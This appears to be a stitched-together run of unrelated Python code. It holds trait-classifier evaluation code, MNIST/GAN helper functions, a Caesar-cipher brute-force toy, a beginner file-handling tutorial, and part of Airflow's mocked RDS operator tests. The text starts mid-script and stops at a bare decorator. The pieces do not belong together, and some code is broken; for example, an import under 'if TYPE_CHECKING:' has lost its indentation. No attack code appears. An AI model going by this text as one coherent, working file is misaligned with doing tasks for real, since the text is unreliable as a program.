        print(confusion_matrix(truth, pred))
        accuracy = accuracy_score(truth, pred)
        print('Accuracy : ', accuracy)
        # precision = true positive / total predicted positive(True positive + False positive)
        # recall = true positive / total actual positive(True positive + False Negative)
        print(classification_report(truth, pred))
        acscores.append(accuracy)
        prescores.append(precision_score(truth, pred))
        rescores.append(recall_score(truth, pred))
        fscores.append(f1_score(truth, pred))

# Column ranges follow the concatenation order of Y: cSIN, cEXC, cCOM, cRUG, cSOP.
# model5 was trained on cRUG (columns 6:8) and model4 on cSOP (columns 8:10).
_evaluate_trait(model1, 0, 2, '\n\nSincerity', acscores1, prescores1, rescores1, fscores1)
_evaluate_trait(model2, 2, 4, '\n\nExcitement', acscores2, prescores2, rescores2, fscores2)
_evaluate_trait(model3, 4, 6, '\n\nCompetence', acscores3, prescores3, rescores3, fscores3)
_evaluate_trait(model5, 6, 8, '\n\nRuggedness', acscores5, prescores5, rescores5, fscores5)
_evaluate_trait(model4, 8, 10, '\n\nSophistication', acscores4, prescores4, rescores4, fscores4)
# Printing the summary metrics for all the personality traits.
# The loop produces byte-identical output to the original five print pairs.
for _title, _acs, _prs, _rcs, _fss in (
        ('\n\nSincerity', acscores1, prescores1, rescores1, fscores1),
        ('\n\nExcitement', acscores2, prescores2, rescores2, fscores2),
        ('\n\nCompetence', acscores3, prescores3, rescores3, fscores3),
        ('\n\nSophistication', acscores4, prescores4, rescores4, fscores4),
        ('\n\nRuggedness', acscores5, prescores5, rescores5, fscores5)):
    print(_title)
    print(_acs,'\nMean : ',np.mean(_acs),'\nStandard deviation : ',np.std(_acs),'\nPrecision Score : ',np.mean(_prs),'\nRecall Score : ',np.mean(_rcs),'\nF1 Score : ',np.mean(_fss))
|
import torch
from torch import nn
import torchvision.utils as vutils
import torchvision.datasets as dset
from torch.utils.data import DataLoader
import torchvision.transforms as transforms
import numpy as np
import matplotlib.pyplot as plt
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def get_random_mask_mnist(input_batch):
    """Return a boolean mask of shape (c, h, w) hiding one random region.

    With equal probability one of four rectangular regions (upper/lower or
    left/right strip, indices 4..27) of channel 0 is zeroed; everything
    else stays visible.  The batch dimension of *input_batch* is ignored.
    """
    _, channels, height, width = input_batch.size()
    mask = torch.ones((channels, height, width), device=device, dtype=torch.bool)
    split_horizontally = torch.rand(1).item() > 0.5
    pick_first_half = torch.rand(1).item() > 0.5
    if split_horizontally:
        if pick_first_half:
            mask[0, 4:16, 4:28] = 0
        else:
            mask[0, 16:28, 4:28] = 0
    else:
        if pick_first_half:
            mask[0, 4:28, 4:16] = 0
        else:
            mask[0, 4:28, 16:28] = 0
    return mask
def select_white_line_images(data, proba):
    """With probability *proba*, stamp a white bar onto every image of the batch.

    The bar covers rows 8-10, columns 6-15 of channel 0.  A copy of *data*
    is returned; the input tensor is never modified.
    """
    stamped = data.clone()
    if torch.rand(1).item() <= proba:
        stamped[:, 0, 8:11, 6:16] = 1
    return stamped
def weights_init(m):
    """Custom layer initialisation, dispatched on the layer class name.

    Conv*: weights ~ N(0, 0.2); BatchNorm*: weights ~ N(1, 0.2);
    Linear: Xavier-uniform weights.  All matching layers get zero biases.
    """
    layer_kind = m.__class__.__name__
    if 'Conv' in layer_kind:
        nn.init.normal_(m.weight.data, 0.0, 0.2)
        nn.init.constant_(m.bias.data, 0)
    elif 'BatchNorm' in layer_kind:
        nn.init.normal_(m.weight.data, 1.0, 0.2)
        nn.init.constant_(m.bias.data, 0)
    elif 'Linear' in layer_kind:
        nn.init.xavier_uniform_(m.weight.data)
        nn.init.constant_(m.bias.data, 0)
def freeze(network):
    """Disable gradient tracking for every parameter of *network*."""
    for param in network.parameters():
        param.requires_grad = False
def unfreeze(network):
    """Re-enable gradient tracking for every parameter of *network*."""
    for param in network.parameters():
        param.requires_grad = True
def sample_z(batch_size, z_size):
    """Sample latent codes uniformly from the surface of the unit sphere.

    Draws Gaussian vectors and normalizes each row to unit length;
    returns a tensor of shape (batch_size, 1, z_size).
    """
    gaussian = torch.randn(batch_size, z_size, device=device)
    row_norms = gaussian.pow(2).sum(dim=1, keepdim=True).sqrt().expand(-1, z_size)
    unit_vectors = gaussian / row_norms
    return unit_vectors.unsqueeze(1)
def momentum_correction(net_Z, H, z, STEPS):
    """Iteratively refine the latent code *z* for STEPS iterations using net_Z.

    NOTE(review): assumes net_Z returns 20 channels on its last axis -- the
    first 10 a predicted code, the last 10 a velocity -- confirm against the
    net_Z architecture.
    """
    # optimize z
    for _ in range(STEPS):
        z_t = net_Z(H.squeeze(3).permute(0, 2, 1), z)
        v_t = z_t[:, :, 10:]  # velocity half of the prediction
        z_t = z_t[:, :, :10]  # predicted-code half
        rho = torch.sum(torch.abs(v_t), dim=2, keepdim=True)  # step length from velocity magnitude
        # Move z a distance rho along the unit direction toward the predicted code.
        z_t = z + rho * (z_t - z) / torch.norm((z_t - z), dim=2, keepdim=True)
        z = z_t
    return z
def plot_images(images, title=""):
    """Display a batch of images as one normalized grid (blocks until closed)."""
    plt.figure(figsize=(8, 8))
    plt.axis("off")
    plt.title(title)
    # make_grid tiles the batch; move to CPU and reorder CHW -> HWC for imshow.
    plt.imshow(np.transpose(vutils.make_grid(images, padding=2, normalize=True).cpu(), (1, 2, 0)))
    plt.show()
def get_mnist_data(batch_size, workers=2):
    """Dataset

    Download MNIST into /tmp/mnist if needed, pad the 28x28 images to 32x32
    and normalize them to [-1, 1]; return (train_dataloader, test_dataloader).
    """
    dataroot = '/tmp/mnist'
    transform = transforms.Compose([
        transforms.Pad(2),
        transforms.ToTensor(),
        transforms.Normalize((0.5,), (0.5,))])
    train_dataset = dset.MNIST(dataroot, train=True, download=True, transform=transform)
    test_dataset = dset.MNIST(dataroot, train=False, download=True, transform=transform)
    # Create the dataloader
    train_dataloader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)
    test_dataloader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)
    return train_dataloader, test_dataloader
def add_noise_to_image(batch_images, ratio_noise_per_batch=0.2):
    """Corrupt a fraction of the batch by overwriting their top halves.

    The top half of one randomly chosen image is copied over the top half
    of ratio_noise_per_batch of the images (chosen at random).  Returns a
    corrupted copy; the input batch is left untouched.
    """
    corrupted = batch_images.clone()
    half_height = int(batch_images.size(2) / 2)
    # Top half of one randomly chosen donor image (length-1 index keeps the dim).
    donor_top = batch_images[torch.randint(batch_images.size(0), (1,)), :, :half_height, :]
    n_noisy = int(corrupted.size(0) * ratio_noise_per_batch)
    victims = torch.randperm(corrupted.size(0))[:n_noisy]
    corrupted[victims, :, :half_height, :] = donor_top
    return corrupted
# Caesar-cipher brute force: print the message decrypted under every key.
# FIX: raw_input() is Python-2-only (NameError on Python 3); use a small
# compatibility shim so the script runs under either interpreter.
try:
    input_function = raw_input
except NameError:
    input_function = input
msg = input_function(' What is your fate Jolena? ')
ALPHABET = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
msg = msg.upper()
for key in range(len(ALPHABET)):
    # NOTE(review): result starts with a single space (kept from the
    # original) -- each decryption is printed with a leading space.
    result = ' '
    for symbol in msg:
        if symbol in ALPHABET:
            num = ALPHABET.find(symbol)
            num = num - key
            if num < 0:
                num = num + len(ALPHABET)
            result = result + ALPHABET[num]
        else:
            result = result + symbol
    print(' The fates declare your number is.........%s! %s' % (key, result))
|
import os
# os.path.join builds a path using the OS-appropriate separator.
print(os.path.join('usr', 'bin', 'spam'))
myFiles = ['accounts.txt', 'details.csv', 'invite.docx']
for filenames in myFiles:
    print(os.path.join('c:\\Users/hp/Desktop/python', filenames))
print(os.getcwd())
# FIX: use a raw string for the Windows path.  The original relied on
# '\h', '\P', '\H' not being recognized escapes (SyntaxWarning on modern
# Python); the raw string has the identical value.
print(os.path.isabs(r'C:\Users\hp\PycharmProjects\HackeRank'))
path = 'c:\\Users/hp/Downloads/things_fall_apart--_full_text.pdf'
print(os.path.dirname(path))
print(os.path.basename(path))
print(os.path.split(path))
path2 = 'c:\\Users/hp/Desktop/python'
print(os.path.getsize(path2))
print(os.listdir())
print(os.path.exists('d:\\'))
# Read two local text files.
# NOTE(review): these handles are never closed -- a `with` block would be safer.
helloFile = open('c:\\Users/hp/Desktop/Hello.txt' , 'r')
content = helloFile.read()
print(content)
open1 = open('c:\\Users/hp/Desktop/sonnet29.txt', 'r')
open2 = open1.read()
print(open2)
# Write, append, then re-read a local file to demonstrate the three modes.
baconFile = open('bacon.txt', 'w')
baconFile.write('Hello World!\n')
baconFile.close()
baconFile = open('bacon.txt', 'a')
baconFile.write('Bacon is not a vegetable.')
baconFile.close()
baconFile = open('bacon.txt')
content2 = baconFile.read()
print(content2)
import shelve
# Persist a list under the key 'cats' in the shelf database file 'mydata'.
shelfFile = shelve.open('mydata')
cats = ['Marcellus', 'Pooka', 'Simon']
shelfFile['cats'] = cats
print(shelfFile['cats'])
shelfFile.close()
print(type(shelfFile))
# Reopen the shelf to show that keys()/values() behave like a dict's.
shelfFile = shelve.open('mydata')
print(list(shelfFile.keys()))
print(list(shelfFile.values()))
shelfFile.close()
import pprint
cats = [{'name': 'Marcellus', 'desc':'Warrior'}, {'name':'Pooka', 'desc':'Fluffy'}]
pprint.pformat(cats)  # NOTE(review): return value discarded -- this line has no effect
# Write the data structure out as a Python module, then import it back.
fileObj = open('myCats.py', 'w')
fileObj.write('cats = ' + pprint.pformat(cats) + '\n')
fileObj.close()
fileObj = open('myCats.py', 'r')
content3 = fileObj.read()
print(content3)
import myCats
print(myCats.cats)
print(myCats.cats[0])
print(myCats.cats[0]['name'])
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
import logging
from typing import TYPE_CHECKING
from unittest import mock
from unittest.mock import patch
import pytest
from moto import mock_rds
from airflow.exceptions import TaskDeferred
from airflow.models import DAG
from airflow.providers.amazon.aws.hooks.rds import RdsHook
from airflow.providers.amazon.aws.operators.rds import (
RdsBaseOperator,
RdsCancelExportTaskOperator,
RdsCopyDbSnapshotOperator,
RdsCreateDbInstanceOperator,
RdsCreateDbSnapshotOperator,
RdsCreateEventSubscriptionOperator,
RdsDeleteDbInstanceOperator,
RdsDeleteDbSnapshotOperator,
RdsDeleteEventSubscriptionOperator,
RdsStartDbOperator,
RdsStartExportTaskOperator,
RdsStopDbOperator,
)
from airflow.providers.amazon.aws.triggers.rds import RdsDbAvailableTrigger, RdsDbStoppedTrigger
from airflow.utils import timezone
if TYPE_CHECKING:
from airflow.providers.amazon.aws.hooks.base_aws import AwsGenericHook
# Fixed start date shared by every test DAG below.
DEFAULT_DATE = timezone.datetime(2019, 1, 1)
AWS_CONN = "amazon_default"
# Resource identifiers reused across the moto-mocked test cases.
DB_INSTANCE_NAME = "my-db-instance"
DB_CLUSTER_NAME = "my-db-cluster"
DB_INSTANCE_SNAPSHOT = "my-db-instance-snap"
DB_CLUSTER_SNAPSHOT = "my-db-cluster-snap"
DB_INSTANCE_SNAPSHOT_COPY = "my-db-instance-snap-copy"
DB_CLUSTER_SNAPSHOT_COPY = "my-db-cluster-snap-copy"
EXPORT_TASK_NAME = "my-db-instance-snap-export"
# NOTE(review): the region segment "es-east-1" in these ARNs looks like a
# typo for "us-east-1"; harmless under moto's mocks, but worth confirming.
EXPORT_TASK_SOURCE = "arn:aws:rds:es-east-1::snapshot:my-db-instance-snap"
EXPORT_TASK_ROLE_NAME = "MyRole"
EXPORT_TASK_ROLE_ARN = "arn:aws:iam:es-east-1::role/MyRole"
EXPORT_TASK_KMS = "arn:aws:kms:es-east-1::key/*****-****-****-****-********"
EXPORT_TASK_BUCKET = "my-exports-bucket"
SUBSCRIPTION_NAME = "my-db-instance-subscription"
SUBSCRIPTION_TOPIC = "arn:aws:sns:us-east-1::MyTopic"
def _create_db_instance(hook: RdsHook):
    """Create the shared test DB instance via the (mocked) RDS API and sanity-check it."""
    hook.conn.create_db_instance(
        DBInstanceIdentifier=DB_INSTANCE_NAME,
        Engine="postgres",
        DBInstanceClass="db.m4.large",
    )
    instances = hook.conn.describe_db_instances()["DBInstances"]
    if not instances:
        raise ValueError("AWS not properly mocked")
def _create_db_cluster(hook: RdsHook):
    """Create the shared test DB cluster via the (mocked) RDS API and sanity-check it."""
    hook.conn.create_db_cluster(
        DBClusterIdentifier=DB_CLUSTER_NAME,
        MasterUsername="admin",
        MasterUserPassword="admin-pass",
        Engine="mysql",
    )
    clusters = hook.conn.describe_db_clusters()["DBClusters"]
    if not clusters:
        raise ValueError("AWS not properly mocked")
def _create_db_instance_snapshot(hook: RdsHook):
    """Snapshot the test DB instance and verify the mock registered it."""
    hook.conn.create_db_snapshot(
        DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT,
        DBInstanceIdentifier=DB_INSTANCE_NAME,
    )
    snapshots = hook.conn.describe_db_snapshots()["DBSnapshots"]
    if not snapshots:
        raise ValueError("AWS not properly mocked")
def _create_db_cluster_snapshot(hook: RdsHook):
    """Snapshot the test DB cluster and verify the mock registered it."""
    hook.conn.create_db_cluster_snapshot(
        DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT,
        DBClusterIdentifier=DB_CLUSTER_NAME,
    )
    snapshots = hook.conn.describe_db_cluster_snapshots()["DBClusterSnapshots"]
    if not snapshots:
        raise ValueError("AWS not properly mocked")
def _start_export_task(hook: RdsHook):
    """Kick off the snapshot-export task used by the export-task tests."""
    hook.conn.start_export_task(
        ExportTaskIdentifier=EXPORT_TASK_NAME,
        SourceArn=EXPORT_TASK_SOURCE,
        S3BucketName=EXPORT_TASK_BUCKET,
        IamRoleArn=EXPORT_TASK_ROLE_ARN,
        KmsKeyId=EXPORT_TASK_KMS,
    )
    tasks = hook.conn.describe_export_tasks()["ExportTasks"]
    if not tasks:
        raise ValueError("AWS not properly mocked")
def _create_event_subscription(hook: RdsHook):
    """Create the DB-instance event subscription and verify the mock registered it."""
    hook.conn.create_event_subscription(
        SubscriptionName=SUBSCRIPTION_NAME,
        SnsTopicArn=SUBSCRIPTION_TOPIC,
        SourceIds=[DB_INSTANCE_NAME],
        SourceType="db-instance",
    )
    subscriptions = hook.conn.describe_event_subscriptions()["EventSubscriptionsList"]
    if not subscriptions:
        raise ValueError("AWS not properly mocked")
def _patch_hook_get_connection(hook: AwsGenericHook) -> None:
    """Stub out Airflow's Connection lookup on *hook*.

    Every AWS call in these tests is mocked, so no real connection is
    needed; stubbing also silences the missing-connection warning.
    """
    hook.get_connection = lambda _: None
class TestBaseRdsOperator:
    """Smoke tests for RdsBaseOperator construction and its hook."""

    dag = None
    op = None

    @classmethod
    def setup_class(cls):
        default_args = {"owner": "airflow", "start_date": DEFAULT_DATE}
        cls.dag = DAG("test_dag", default_args=default_args)
        cls.op = RdsBaseOperator(task_id="test_task", aws_conn_id="aws_default", dag=cls.dag)

    @classmethod
    def teardown_class(cls):
        del cls.op
        del cls.dag

    def test_hook_attribute(self):
        assert hasattr(self.op, "hook")
        assert self.op.hook.__class__.__name__ == "RdsHook"
class TestRdsCreateDbSnapshotOperator:
    """Tests for RdsCreateDbSnapshotOperator against moto-mocked RDS."""
    @classmethod
    def setup_class(cls):
        # Shared DAG and hook; the hook's connection lookup is stubbed out.
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)
    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook
    @mock_rds
    def test_create_db_instance_snapshot(self):
        """Operator creates exactly one snapshot of an existing DB instance."""
        _create_db_instance(self.hook)
        instance_snapshot_operator = RdsCreateDbSnapshotOperator(
            task_id="test_instance",
            db_type="instance",
            db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
            db_identifier=DB_INSTANCE_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(instance_snapshot_operator.hook)
        instance_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
        instance_snapshots = result.get("DBSnapshots")
        assert instance_snapshots
        assert len(instance_snapshots) == 1
    @mock_rds
    @patch.object(RdsHook, "wait_for_db_snapshot_state")
    def test_create_db_instance_snapshot_no_wait(self, mock_wait):
        """wait_for_completion=False must skip the snapshot-state waiter."""
        _create_db_instance(self.hook)
        instance_snapshot_operator = RdsCreateDbSnapshotOperator(
            task_id="test_instance_no_wait",
            db_type="instance",
            db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
            db_identifier=DB_INSTANCE_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(instance_snapshot_operator.hook)
        instance_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)
        instance_snapshots = result.get("DBSnapshots")
        assert instance_snapshots
        assert len(instance_snapshots) == 1
        mock_wait.assert_not_called()
    @mock_rds
    def test_create_db_cluster_snapshot(self):
        """Operator creates exactly one snapshot of an existing DB cluster."""
        _create_db_cluster(self.hook)
        cluster_snapshot_operator = RdsCreateDbSnapshotOperator(
            task_id="test_cluster",
            db_type="cluster",
            db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
            db_identifier=DB_CLUSTER_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(cluster_snapshot_operator.hook)
        cluster_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
        cluster_snapshots = result.get("DBClusterSnapshots")
        assert cluster_snapshots
        assert len(cluster_snapshots) == 1
    @mock_rds
    @patch.object(RdsHook, "wait_for_db_cluster_snapshot_state")
    def test_create_db_cluster_snapshot_no_wait(self, mock_wait):
        """wait_for_completion=False must skip the cluster-snapshot waiter."""
        _create_db_cluster(self.hook)
        cluster_snapshot_operator = RdsCreateDbSnapshotOperator(
            task_id="test_cluster_no_wait",
            db_type="cluster",
            db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
            db_identifier=DB_CLUSTER_NAME,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(cluster_snapshot_operator.hook)
        cluster_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
        cluster_snapshots = result.get("DBClusterSnapshots")
        assert cluster_snapshots
        assert len(cluster_snapshots) == 1
        mock_wait.assert_not_called()
class TestRdsCopyDbSnapshotOperator:
    """Tests for RdsCopyDbSnapshotOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_copy_db_instance_snapshot(self):
        """Copying an instance snapshot creates the target snapshot."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        instance_snapshot_operator = RdsCopyDbSnapshotOperator(
            task_id="test_instance",
            db_type="instance",
            source_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
            target_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT_COPY,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(instance_snapshot_operator.hook)
        instance_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT_COPY)
        instance_snapshots = result.get("DBSnapshots")
        assert instance_snapshots
        assert len(instance_snapshots) == 1

    @mock_rds
    @patch.object(RdsHook, "wait_for_db_snapshot_state")
    def test_copy_db_instance_snapshot_no_wait(self, mock_await_status):
        """With wait_for_completion=False the instance-snapshot wait helper is skipped."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        instance_snapshot_operator = RdsCopyDbSnapshotOperator(
            task_id="test_instance_no_wait",
            db_type="instance",
            source_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
            target_db_snapshot_identifier=DB_INSTANCE_SNAPSHOT_COPY,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(instance_snapshot_operator.hook)
        instance_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT_COPY)
        instance_snapshots = result.get("DBSnapshots")
        assert instance_snapshots
        assert len(instance_snapshots) == 1
        mock_await_status.assert_not_called()

    @mock_rds
    def test_copy_db_cluster_snapshot(self):
        """Copying a cluster snapshot creates the target cluster snapshot."""
        _create_db_cluster(self.hook)
        _create_db_cluster_snapshot(self.hook)
        cluster_snapshot_operator = RdsCopyDbSnapshotOperator(
            task_id="test_cluster",
            db_type="cluster",
            source_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
            target_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT_COPY,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(cluster_snapshot_operator.hook)
        cluster_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_cluster_snapshots(
            DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT_COPY
        )
        cluster_snapshots = result.get("DBClusterSnapshots")
        assert cluster_snapshots
        assert len(cluster_snapshots) == 1

    @mock_rds
    # Bug fix: this test previously patched the *instance* wait method
    # (wait_for_db_snapshot_state) for a *cluster* copy and never passed
    # wait_for_completion=False, so assert_not_called() passed vacuously and
    # the no-wait path was untested. Patch the cluster wait method and
    # actually request no-wait.
    @patch.object(RdsHook, "wait_for_db_cluster_snapshot_state")
    def test_copy_db_cluster_snapshot_no_wait(self, mock_await_status):
        """With wait_for_completion=False the cluster-snapshot wait helper is skipped."""
        _create_db_cluster(self.hook)
        _create_db_cluster_snapshot(self.hook)
        cluster_snapshot_operator = RdsCopyDbSnapshotOperator(
            task_id="test_cluster_no_wait",
            db_type="cluster",
            source_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
            target_db_snapshot_identifier=DB_CLUSTER_SNAPSHOT_COPY,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(cluster_snapshot_operator.hook)
        cluster_snapshot_operator.execute(None)
        result = self.hook.conn.describe_db_cluster_snapshots(
            DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT_COPY
        )
        cluster_snapshots = result.get("DBClusterSnapshots")
        assert cluster_snapshots
        assert len(cluster_snapshots) == 1
        mock_await_status.assert_not_called()
class TestRdsDeleteDbSnapshotOperator:
    """Tests for RdsDeleteDbSnapshotOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_delete_db_instance_snapshot(self):
        """Deleting an instance snapshot waits for the 'deleted' state and removes the snapshot."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        instance_snapshot_operator = RdsDeleteDbSnapshotOperator(
            task_id="test_instance",
            db_type="instance",
            db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(instance_snapshot_operator.hook)
        # Patch on the operator's own hook instance so we can assert the wait call.
        with patch.object(instance_snapshot_operator.hook, "wait_for_db_snapshot_state") as mock_wait:
            instance_snapshot_operator.execute(None)
            mock_wait.assert_called_once_with(DB_INSTANCE_SNAPSHOT, target_state="deleted")
        # Describing the deleted snapshot must now fail.
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)

    @mock_rds
    def test_delete_db_instance_snapshot_no_wait(self):
        """
        Check that the operator does not wait for the DB instance snapshot delete operation to complete when
        wait_for_completion=False
        """
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        instance_snapshot_operator = RdsDeleteDbSnapshotOperator(
            task_id="test_delete_db_instance_snapshot_no_wait",
            db_type="instance",
            db_snapshot_identifier=DB_INSTANCE_SNAPSHOT,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(instance_snapshot_operator.hook)
        with patch.object(instance_snapshot_operator.hook, "wait_for_db_snapshot_state") as mock_wait:
            instance_snapshot_operator.execute(None)
            mock_wait.assert_not_called()
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_db_snapshots(DBSnapshotIdentifier=DB_INSTANCE_SNAPSHOT)

    @mock_rds
    def test_delete_db_cluster_snapshot(self):
        """Deleting a cluster snapshot waits for the 'deleted' state and removes the snapshot."""
        _create_db_cluster(self.hook)
        _create_db_cluster_snapshot(self.hook)
        cluster_snapshot_operator = RdsDeleteDbSnapshotOperator(
            task_id="test_cluster",
            db_type="cluster",
            db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(cluster_snapshot_operator.hook)
        with patch.object(cluster_snapshot_operator.hook, "wait_for_db_cluster_snapshot_state") as mock_wait:
            cluster_snapshot_operator.execute(None)
            mock_wait.assert_called_once_with(DB_CLUSTER_SNAPSHOT, target_state="deleted")
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)

    @mock_rds
    def test_delete_db_cluster_snapshot_no_wait(self):
        """
        Check that the operator does not wait for the DB cluster snapshot delete operation to complete when
        wait_for_completion=False
        """
        _create_db_cluster(self.hook)
        _create_db_cluster_snapshot(self.hook)
        cluster_snapshot_operator = RdsDeleteDbSnapshotOperator(
            task_id="test_delete_db_cluster_snapshot_no_wait",
            db_type="cluster",
            db_snapshot_identifier=DB_CLUSTER_SNAPSHOT,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(cluster_snapshot_operator.hook)
        with patch.object(cluster_snapshot_operator.hook, "wait_for_db_cluster_snapshot_state") as mock_wait:
            cluster_snapshot_operator.execute(None)
            mock_wait.assert_not_called()
        with pytest.raises(self.hook.conn.exceptions.ClientError):
            self.hook.conn.describe_db_cluster_snapshots(DBClusterSnapshotIdentifier=DB_CLUSTER_SNAPSHOT)
class TestRdsStartExportTaskOperator:
    """Tests for RdsStartExportTaskOperator against a moto-mocked RDS backend."""

    @classmethod
    def setup_class(cls):
        cls.dag = DAG("test_dag", default_args={"owner": "airflow", "start_date": DEFAULT_DATE})
        cls.hook = RdsHook(aws_conn_id=AWS_CONN, region_name="us-east-1")
        _patch_hook_get_connection(cls.hook)

    @classmethod
    def teardown_class(cls):
        del cls.dag
        del cls.hook

    @mock_rds
    def test_start_export_task(self):
        """Starting an export task yields a single task that moto reports as complete."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        start_export_operator = RdsStartExportTaskOperator(
            task_id="test_start",
            export_task_identifier=EXPORT_TASK_NAME,
            source_arn=EXPORT_TASK_SOURCE,
            iam_role_arn=EXPORT_TASK_ROLE_ARN,
            kms_key_id=EXPORT_TASK_KMS,
            s3_bucket_name=EXPORT_TASK_BUCKET,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
        )
        _patch_hook_get_connection(start_export_operator.hook)
        start_export_operator.execute(None)
        result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
        export_tasks = result.get("ExportTasks")
        assert export_tasks
        assert len(export_tasks) == 1
        assert export_tasks[0]["Status"] == "complete"

    @mock_rds
    @patch.object(RdsHook, "wait_for_export_task_state")
    def test_start_export_task_no_wait(self, mock_await_status):
        """With wait_for_completion=False the export-task wait helper is skipped."""
        _create_db_instance(self.hook)
        _create_db_instance_snapshot(self.hook)
        start_export_operator = RdsStartExportTaskOperator(
            task_id="test_start_no_wait",
            export_task_identifier=EXPORT_TASK_NAME,
            source_arn=EXPORT_TASK_SOURCE,
            iam_role_arn=EXPORT_TASK_ROLE_ARN,
            kms_key_id=EXPORT_TASK_KMS,
            s3_bucket_name=EXPORT_TASK_BUCKET,
            aws_conn_id=AWS_CONN,
            dag=self.dag,
            wait_for_completion=False,
        )
        _patch_hook_get_connection(start_export_operator.hook)
        start_export_operator.execute(None)
        result = self.hook.conn.describe_export_tasks(ExportTaskIdentifier=EXPORT_TASK_NAME)
        export_tasks = result.get("ExportTasks")
        assert export_tasks
        assert len(export_tasks) == 1
        assert export_tasks[0]["Status"] == "complete"
        mock_await_status.assert_not_called()
class TestRdsCancelExportTaskOperator:
    """Tests for RdsCancelExportTaskOperator against a moto-mocked RDS backend."""

    @classmethod
